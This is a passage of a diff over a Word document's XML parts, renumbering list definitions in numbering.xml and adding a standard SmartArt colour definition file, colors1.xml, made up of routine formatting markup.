+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="24"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="19"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="9">
     <w:abstractNumId w:val="25"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -12747,269 +14292,74 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="24"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="4"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="13"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="9"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="7">
-    <w:abstractNumId w:val="19"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="8">
-    <w:abstractNumId w:val="14"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="9">
-    <w:abstractNumId w:val="20"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="13">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="14">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="18">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="19">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="21">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="25">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="26">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="27">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="22">
+  <w:num w:numId="28">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="23">
-    <w:abstractNumId w:val="21"/>
+  <w:num w:numId="29">
+    <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="16"/>
+  <w:num w:numId="30">
+    <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="12"/>
+  <w:num w:numId="31">
+    <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="26">
+  <w:num w:numId="32">
     <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="27">
-    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -14004,6 +15354,3191 @@
 </w:styles>
 </file>
 
+<file path=word/diagrams/colors1.xml><?xml version="1.0" encoding="utf-8"?>
+<dgm:colorsDef xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uniqueId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2">
+  <dgm:title val=""/>
+  <dgm:desc val=""/>
+  <dgm:catLst>
+    <dgm:cat type="accent1" pri="11200"/>
+  </dgm:catLst>
+  <dgm:styleLbl name="node0">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="lnNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="vennNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="50000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node2">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node3">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node4">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgImgPlace1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="50000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignImgPlace1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="50000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgImgPlace1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="50000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="sibTrans2D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgSibTrans2D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgSibTrans2D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="sibTrans1D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="callout">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="50000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst0">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst2">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst3">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst4">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst/>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D2">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D3">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D4">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:shade val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D2">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:shade val="60000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D3">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:shade val="80000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D4">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:shade val="80000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="conFgAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="trAlignAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
